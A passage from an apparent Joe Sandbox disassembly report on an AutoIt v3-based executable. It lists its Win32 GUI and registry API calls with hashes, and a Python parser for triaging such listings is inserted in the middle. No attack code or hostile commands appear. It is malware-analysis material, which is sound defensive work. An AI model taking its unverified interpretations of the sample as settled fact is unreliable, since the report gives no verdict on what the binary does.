                                                                        • SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020), ref: 00459857
                                                                        • ShowWindow.USER32(?,00000004), ref: 00459865
                                                                        • CreateWindowExW.USER32(00000000,static,00000000,000001F4,50000001,0000000B,0000000B,?,?,?,00000000,00000000), ref: 004598AF
                                                                        • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 004598C3
                                                                        • GetStockObject.GDI32(00000011), ref: 004598CD
                                                                        • SelectObject.GDI32(00000000,00000000), ref: 004598D5
                                                                        • GetTextFaceW.GDI32(00000000,00000040,?), ref: 004598E5
                                                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 004598EE
                                                                        • DeleteDC.GDI32(00000000), ref: 004598F8
                                                                        • _wcslen.LIBCMT ref: 00459916
                                                                        • _wcscpy.LIBCMT ref: 0045993A
                                                                        • CreateFontW.GDI32(?,00000000,00000000,00000000,00000190,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 004599DB
                                                                        • SendMessageW.USER32(00000000,00000030,00000000,00000001), ref: 004599EF
                                                                        • GetDC.USER32(00000000), ref: 004599FC
                                                                        • SelectObject.GDI32(00000000,?), ref: 00459A0C
                                                                        • SelectObject.GDI32(00000000,00000007), ref: 00459A37
                                                                        • ReleaseDC.USER32(00000000,00000000), ref: 00459A42
                                                                        • MoveWindow.USER32(00000000,0000000B,?,?,00000190,00000001), ref: 00459A5F
                                                                        • ShowWindow.USER32(?,00000004,?,00000000,00000000,00000000,00000190,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00459A6D
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: Window$Create$Object$Global$Rect$DeleteFileSelect$MessageSendShow$AdjustAllocCapsClientCloseCopyDesktopDestroyDeviceFaceFontFreeHandleImageLoadLockMovePictureReadReleaseSizeStockStreamTextUnlock_wcscpy_wcslen
                                                                        • String ID: $AutoIt v3$DISPLAY$static
                                                                        • API String ID: 4040870279-2373415609
                                                                        • Opcode ID: 6d6993f212ed0893db9275c3f84f169bec7eeddded5228c42ae13acbc858d7fb
                                                                        • Instruction ID: 0470743097681e939cd033c9659fc80dd101af82a4c7fdd8c03ae3a829a790b9
                                                                        • Opcode Fuzzy Hash: 6d6993f212ed0893db9275c3f84f169bec7eeddded5228c42ae13acbc858d7fb
                                                                        • Instruction Fuzzy Hash: 92027D71600204EFDB14DF64CD89FAE7BB9BB48305F108569FA05AB292D7B4ED05CB68
                                                                        APIs
                                                                        • GetSysColor.USER32(00000012), ref: 0044181E
                                                                        • SetTextColor.GDI32(?,?), ref: 00441826
                                                                        • GetSysColorBrush.USER32(0000000F), ref: 0044183D
                                                                        • GetSysColor.USER32(0000000F), ref: 00441849
                                                                        • SetBkColor.GDI32(?,?), ref: 00441864
                                                                        • SelectObject.GDI32(?,?), ref: 00441874
                                                                        • InflateRect.USER32(?,000000FF,000000FF), ref: 004418AA
                                                                        • GetSysColor.USER32(00000010), ref: 004418B2
                                                                        • CreateSolidBrush.GDI32(00000000), ref: 004418B9
                                                                        • FrameRect.USER32(?,?,00000000), ref: 004418CA
                                                                        • DeleteObject.GDI32(?), ref: 004418D5
                                                                        • InflateRect.USER32(?,000000FE,000000FE), ref: 0044192F
                                                                        • FillRect.USER32(?,?,?), ref: 00441970
                                                                          • Part of subcall function 004308EF: GetSysColor.USER32(0000000E), ref: 00430913
                                                                          • Part of subcall function 004308EF: SetTextColor.GDI32(?,00000000), ref: 0043091B
                                                                          • Part of subcall function 004308EF: GetSysColorBrush.USER32(0000000F), ref: 0043094E
                                                                          • Part of subcall function 004308EF: GetSysColor.USER32(0000000F), ref: 00430959
                                                                          • Part of subcall function 004308EF: GetSysColor.USER32(00000011), ref: 00430979
                                                                          • Part of subcall function 004308EF: CreatePen.GDI32(00000000,00000001,00743C00), ref: 0043098B
                                                                          • Part of subcall function 004308EF: SelectObject.GDI32(?,00000000), ref: 0043099C
                                                                          • Part of subcall function 004308EF: SetBkColor.GDI32(?,?), ref: 004309A6
                                                                          • Part of subcall function 004308EF: SelectObject.GDI32(?,?), ref: 004309B4
                                                                          • Part of subcall function 004308EF: InflateRect.USER32(?,000000FF,000000FF), ref: 004309D9
                                                                          • Part of subcall function 004308EF: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 004309F4
                                                                          • Part of subcall function 004308EF: GetWindowLongW.USER32(?,000000F0), ref: 00430A09
                                                                          • Part of subcall function 004308EF: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00430A29
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: Color$Rect$Object$BrushInflateSelect$CreateText$DeleteFillFrameLongMessageRoundSendSolidWindow
                                                                        • String ID:
                                                                        • API String ID: 69173610-0
                                                                        • Opcode ID: 30a00988875c6ded0cd8785ba6f1a2265e8c4300a859e5cf9301ac7df871b910
                                                                        • Instruction ID: 7a723b7ebc9985c742df47702d768576d0729d4f0beaa2415310c4eb73739e4f
                                                                        • Opcode Fuzzy Hash: 30a00988875c6ded0cd8785ba6f1a2265e8c4300a859e5cf9301ac7df871b910
                                                                        • Instruction Fuzzy Hash: 76B15BB1508301AFD304DF64DD88A6FB7F8FB88720F104A2DF996922A0D774E945CB66
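The two API xref listings above (the routine that creates the "AutoIt v3" window and ends at 00459A6D, and the routine at 0044181E whose listing also carries "Part of subcall function" entries) are the part of these records a triage script actually wants: which DLLs a function imports from, which literal strings the disassembler resolved at the call sites, and which xrefs belong to the function itself versus a callee. The following parser is an added example written for this page; it is not Joe Sandbox code and the report offers no such tool. It handles the three line shapes that occur in the records (argument list present, argument list absent as in GetDesktopWindow.USER32 ref: 00459581, and inherited subcall entries). The reading of the .sdmp name fields beyond the base address, namely that the fifth dotted field is a Win32 PAGE_* protection value, is an assumption; the sample lines are copied from the records on this page.

```python
"""Parse the per-function 'APIs' xref listings and memory-dump names in a
Joe Sandbox report. Added example for this page; it is not Joe Sandbox code.
Field meanings of the .sdmp name beyond the base address are an assumption
(see parse_dump_name)."""
import re
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple

# One xref line. Forms seen in the report:
#   • DeleteObject.GDI32(?), ref: 0045953B
#   • GetDesktopWindow.USER32 ref: 00459581              (no argument list)
#     • Part of subcall function 004308EF: GetSysColor.USER32(0000000E), ref: 00430913
API_LINE = re.compile(
    r"^\s*•\s*"
    r"(?:Part of subcall function (?P<callee>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<api>[A-Za-z_][A-Za-z0-9_]*)\.(?P<module>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?"
    r"\s*,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$"
)
HEX8 = re.compile(r"^[0-9A-Fa-f]{8}$")


@dataclass(frozen=True)
class ApiRef:
    api: str
    module: str
    args: Tuple[str, ...]
    ref: int                 # address of the call site
    callee: Optional[int]    # set when the xref is inherited from a subcall


def parse_api_lines(text: str) -> List[ApiRef]:
    """Return every xref in a record; lines that are not xrefs are ignored."""
    out: List[ApiRef] = []
    for line in text.splitlines():
        m = API_LINE.match(line)
        if not m:
            continue  # Memory Dump Source, Similarity, fuzzy hashes, ...
        args = tuple(a.strip() for a in m["args"].split(",")) if m["args"] else ()
        callee = int(m["callee"], 16) if m["callee"] else None
        out.append(ApiRef(m["api"], m["module"], args, int(m["ref"], 16), callee))
    return out


def imports_by_module(refs: List[ApiRef]) -> Dict[str, List[str]]:
    """Group distinct API names by DLL for a quick import-profile check."""
    table: Dict[str, set] = {}
    for r in refs:
        table.setdefault(r.module, set()).add(r.api)
    return {mod: sorted(names) for mod, names in sorted(table.items())}


def string_args(refs: List[ApiRef]) -> List[str]:
    """Literal string arguments the disassembler resolved (window class
    names, device names). Hex immediates, '?' placeholders and Function_
    labels are skipped; order of first appearance is kept."""
    seen: List[str] = []
    for r in refs:
        for a in r.args:
            if a in ("", "?") or HEX8.match(a) or a.startswith("Function_"):
                continue
            if a not in seen:
                seen.append(a)
    return seen


# Assumption: the dotted .sdmp name carries the region base address in the
# fourth field and a Win32 PAGE_* protection value in the fifth (0x20 =
# PAGE_EXECUTE_READ on the 0x401000 dump, the code section, fits that reading).
PAGE = {0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
        0x08: "PAGE_WRITECOPY", 0x20: "PAGE_EXECUTE_READ"}


def parse_dump_name(name: str) -> Tuple[int, str]:
    stem = name[:-5] if name.endswith(".sdmp") else name
    fields = stem.split(".")
    base, prot = int(fields[3], 16), int(fields[4], 16)
    return base, PAGE.get(prot, hex(prot))


# Constructed sample: xref lines copied from two records on this page, plus
# one non-xref line to show it is skipped.
SAMPLE = """
• DeleteObject.GDI32(?), ref: 0045953B
• GetDesktopWindow.USER32 ref: 00459581
• CreateWindowExW.USER32(?,AutoIt v3,00000000,?,88C00000,00000002,00000007,?,?,?,00000000,00000000), ref: 004596E8
• CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 004598C3
• _wcslen.LIBCMT ref: 00459916
  • Part of subcall function 004308EF: GetSysColor.USER32(0000000E), ref: 00430913
Memory Dump Source
• Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
"""

if __name__ == "__main__":
    refs = parse_api_lines(SAMPLE)
    print(imports_by_module(refs))
    print(string_args(refs))
    print(parse_dump_name("00000000.00000002.1594125296.0000000000401000"
                          ".00000020.00000001.01000000.00000003.sdmp"))
```

Running it on the sample yields the import profile {GDI32, LIBCMT, USER32}, the literal strings "AutoIt v3" and "DISPLAY", and (0x401000, PAGE_EXECUTE_READ) for the code-section dump. Filtering on callee is None separates a function's own call sites from those the plugin attributes to it through a subcall, which matters when you compare a record's API set against a known runtime (here the AutoIt v3 GUI code) to decide which functions are wrapper and which are payload.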
                                                                        APIs
                                                                        • DestroyWindow.USER32(?), ref: 004590F2
                                                                        • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 004591AF
                                                                        • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 004591EF
                                                                        • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 00459200
                                                                        • CreateWindowExW.USER32(00000008,AutoIt v3,00000000,?,88C00000,?,?,?,00000001,?,00000000,00000000), ref: 00459242
                                                                        • GetClientRect.USER32(00000000,?), ref: 0045924E
                                                                        • CreateWindowExW.USER32(00000000,static,00000000,?,50000000,?,00000004,00000500,00000018,?,00000000,00000000), ref: 00459290
                                                                        • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 004592A2
                                                                        • GetStockObject.GDI32(00000011), ref: 004592AC
                                                                        • SelectObject.GDI32(00000000,00000000), ref: 004592B4
                                                                        • GetTextFaceW.GDI32(00000000,00000040,?), ref: 004592C4
                                                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 004592CD
                                                                        • DeleteDC.GDI32(00000000), ref: 004592D6
                                                                        • CreateFontW.GDI32(?,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 0045931C
                                                                        • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00459334
                                                                        • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,?,00000000,00000000,00000000), ref: 0045936E
                                                                        • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00459382
                                                                        • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00459393
                                                                        • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,?,00000000,00000000,00000000), ref: 004593C8
                                                                        • GetStockObject.GDI32(00000011), ref: 004593D3
                                                                        • SendMessageW.USER32(?,00000030,00000000), ref: 004593E3
                                                                        • ShowWindow.USER32(?,00000004,?,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 004593EE
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                                        • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                                        • API String ID: 2910397461-517079104
                                                                        • Opcode ID: 7a94e82ab5e7eba8c21ff2ad013f2909889a905bd0bc04285d9267b4528ddb10
                                                                        • Instruction ID: c5562805fc82c6770b180505aab83e69ed0b4cba248239bed49a3b83ebf26fc7
                                                                        • Opcode Fuzzy Hash: 7a94e82ab5e7eba8c21ff2ad013f2909889a905bd0bc04285d9267b4528ddb10
                                                                        • Instruction Fuzzy Hash: 71A18371B40214BFEB14DF64CD8AFAE7769AB44711F208529FB05BB2D1D6B4AD00CB68
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: __wcsnicmp
                                                                        • String ID: #NoAutoIt3Execute$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#requireadmin$Cannot parse #include$Unterminated group of comments
                                                                        • API String ID: 1038674560-3360698832
                                                                        • Opcode ID: 23f0f58ea95d18462155f90075fe93dcb11182f556a84baaa607307f542fa917
                                                                        • Instruction ID: 9c7d50a5cd0ee83047e92bfb3361563e61671b380f2e7b4b5fccf758bfaba57c
                                                                        • Opcode Fuzzy Hash: 23f0f58ea95d18462155f90075fe93dcb11182f556a84baaa607307f542fa917
                                                                        • Instruction Fuzzy Hash: B5610670701621B7D711AE219C42FAF335C9F50705F50442BFE05AA286FB7DEE8686AE
                                                                        APIs
                                                                        • LoadCursorW.USER32(00000000,00007F89), ref: 00430754
                                                                        • SetCursor.USER32(00000000), ref: 0043075B
                                                                        • LoadCursorW.USER32(00000000,00007F8A), ref: 0043076C
                                                                        • SetCursor.USER32(00000000), ref: 00430773
                                                                        • LoadCursorW.USER32(00000000,00007F03), ref: 00430784
                                                                        • SetCursor.USER32(00000000), ref: 0043078B
                                                                        • LoadCursorW.USER32(00000000,00007F8B), ref: 0043079C
                                                                        • SetCursor.USER32(00000000), ref: 004307A3
                                                                        • LoadCursorW.USER32(00000000,00007F01), ref: 004307B4
                                                                        • SetCursor.USER32(00000000), ref: 004307BB
                                                                        • LoadCursorW.USER32(00000000,00007F88), ref: 004307CC
                                                                        • SetCursor.USER32(00000000), ref: 004307D3
                                                                        • LoadCursorW.USER32(00000000,00007F86), ref: 004307E4
                                                                        • SetCursor.USER32(00000000), ref: 004307EB
                                                                        • LoadCursorW.USER32(00000000,00007F83), ref: 004307FC
                                                                        • SetCursor.USER32(00000000), ref: 00430803
                                                                        • LoadCursorW.USER32(00000000,00007F85), ref: 00430814
                                                                        • SetCursor.USER32(00000000), ref: 0043081B
                                                                        • LoadCursorW.USER32(00000000,00007F82), ref: 0043082C
                                                                        • SetCursor.USER32(00000000), ref: 00430833
                                                                        • LoadCursorW.USER32(00000000,00007F84), ref: 00430844
                                                                        • SetCursor.USER32(00000000), ref: 0043084B
                                                                        • LoadCursorW.USER32(00000000,00007F04), ref: 0043085C
                                                                        • SetCursor.USER32(00000000), ref: 00430863
                                                                        • LoadCursorW.USER32(00000000,00007F02), ref: 00430874
                                                                        • SetCursor.USER32(00000000), ref: 0043087B
                                                                        • SetCursor.USER32(00000000), ref: 00430887
                                                                        • LoadCursorW.USER32(00000000,00007F00), ref: 00430898
                                                                        • SetCursor.USER32(00000000), ref: 0043089F
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: Cursor$Load
                                                                        • String ID:
                                                                        • API String ID: 1675784387-0
                                                                        • Opcode ID: c7473186da6a924b3206e1e01d9541ab2871430d40d1833d6e341d2f3415b8bd
                                                                        • Instruction ID: ada3a8d1d263842f4cf6b5ed80e179871947c4c62c163598e9ab22da256eac1d
                                                                        • Opcode Fuzzy Hash: c7473186da6a924b3206e1e01d9541ab2871430d40d1833d6e341d2f3415b8bd
                                                                        • Instruction Fuzzy Hash: AF3101729C8205B7EA546BE0BE1DF5D3618AB28727F004836F309B54D09AF551509B6D
                                                                        APIs
                                                                        • GetSysColor.USER32(0000000E), ref: 00430913
                                                                        • SetTextColor.GDI32(?,00000000), ref: 0043091B
                                                                        • GetSysColor.USER32(00000012), ref: 00430933
                                                                        • SetTextColor.GDI32(?,?), ref: 0043093B
                                                                        • GetSysColorBrush.USER32(0000000F), ref: 0043094E
                                                                        • GetSysColor.USER32(0000000F), ref: 00430959
                                                                        • CreateSolidBrush.GDI32(?), ref: 00430962
                                                                        • GetSysColor.USER32(00000011), ref: 00430979
                                                                        • CreatePen.GDI32(00000000,00000001,00743C00), ref: 0043098B
                                                                        • SelectObject.GDI32(?,00000000), ref: 0043099C
                                                                        • SetBkColor.GDI32(?,?), ref: 004309A6
                                                                        • SelectObject.GDI32(?,?), ref: 004309B4
                                                                        • InflateRect.USER32(?,000000FF,000000FF), ref: 004309D9
                                                                        • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 004309F4
                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 00430A09
                                                                        • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00430A29
                                                                        • GetWindowTextW.USER32(00000000,00000000,?), ref: 00430A5A
                                                                        • InflateRect.USER32(?,000000FD,000000FD), ref: 00430A86
                                                                        • DrawFocusRect.USER32(?,?), ref: 00430A91
                                                                        • GetSysColor.USER32(00000011), ref: 00430A9F
                                                                        • SetTextColor.GDI32(?,00000000), ref: 00430AA7
                                                                        • DrawTextW.USER32(?,?,000000FF,?,00000105), ref: 00430ABC
                                                                        • SelectObject.GDI32(?,?), ref: 00430AD0
                                                                        • DeleteObject.GDI32(00000105), ref: 00430ADC
                                                                        • SelectObject.GDI32(?,?), ref: 00430AE3
                                                                        • DeleteObject.GDI32(?), ref: 00430AE9
                                                                        • SetTextColor.GDI32(?,?), ref: 00430AF0
                                                                        • SetBkColor.GDI32(?,?), ref: 00430AFB
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: Color$ObjectText$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                                        • String ID:
                                                                        • API String ID: 1582027408-0
                                                                        • Opcode ID: 877059e5a08506da746904818a271139ce0e07035d8828382933a9fbb09d498c
                                                                        • Instruction ID: b12033eb3fa9204049de4d7caedd8dcf025edfa44633034d6aae7949f8ecba99
                                                                        • Opcode Fuzzy Hash: 877059e5a08506da746904818a271139ce0e07035d8828382933a9fbb09d498c
                                                                        • Instruction Fuzzy Hash: 6F713071900209BFDB04DFA8DD88EAEBBB9FF48710F104619F915A7290D774A941CFA8
                                                                        APIs
                                                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046BAE6
                                                                        • RegCreateKeyExW.ADVAPI32(?,?,00000000,00484EA8,00000000,?,00000000,?,?,?), ref: 0046BB40
                                                                        • RegCloseKey.ADVAPI32(?,00000001,00000000,00000000,00000000), ref: 0046BB8A
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: CloseConnectCreateRegistry
                                                                        • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                                        • API String ID: 3217815495-966354055
                                                                        • Opcode ID: 151c93021cbb490f975a6b7c26e52759c625c8b8a8aebcd11daaf619054c364b
                                                                        • Instruction ID: 14c723365299aea1e32a80c9e2d98689f85295d348ed372ee81e16963ac3f886
                                                                        • Opcode Fuzzy Hash: 151c93021cbb490f975a6b7c26e52759c625c8b8a8aebcd11daaf619054c364b
                                                                        • Instruction Fuzzy Hash: BCE18171604200ABD710EF65C885F1BB7E8EF88704F14895EB949DB352D739ED41CBA9
                                                                        APIs
                                                                        • GetCursorPos.USER32(?), ref: 004566AE
                                                                        • GetDesktopWindow.USER32 ref: 004566C3
                                                                        • GetWindowRect.USER32(00000000), ref: 004566CA
                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 00456722
                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 00456735
                                                                        • DestroyWindow.USER32(?), ref: 00456746
                                                                        • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00456794
                                                                        • SendMessageW.USER32(00000000,00000432,00000000,0000002C), ref: 004567B2
                                                                        • SendMessageW.USER32(?,00000418,00000000,?), ref: 004567C6
                                                                        • SendMessageW.USER32(?,00000439,00000000,0000002C), ref: 004567D6
                                                                        • SendMessageW.USER32(?,00000421,?,?), ref: 004567F6
                                                                        • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 0045680C
                                                                        • IsWindowVisible.USER32(?), ref: 0045682C
                                                                        • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00456848
                                                                        • SendMessageW.USER32(?,00000411,00000001,0000002C), ref: 0045685C
                                                                        • GetWindowRect.USER32(?,?), ref: 00456873
                                                                        • MonitorFromPoint.USER32(?,00000001,00000002), ref: 00456891
                                                                        • GetMonitorInfoW.USER32(00000000,?), ref: 004568A9
                                                                        • CopyRect.USER32(?,?), ref: 004568BE
                                                                        • SendMessageW.USER32(?,00000412,00000000), ref: 00456914
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSendWindow$Rect$LongMonitor$CopyCreateCursorDesktopDestroyFromInfoPointVisible
                                                                        • String ID: ($,$tooltips_class32
                                                                        • API String ID: 225202481-3320066284
                                                                        • Opcode ID: d36279d6046af7916fa8cb53b873a9c87cdaa8c87180e7b1c59dea88ca998a74
                                                                        • Instruction ID: fcdb4dd5bfb9c4cfeeadc9569793f3eee26ed74f2078e1bfb0220ba6a1b85fea
                                                                        • Opcode Fuzzy Hash: d36279d6046af7916fa8cb53b873a9c87cdaa8c87180e7b1c59dea88ca998a74
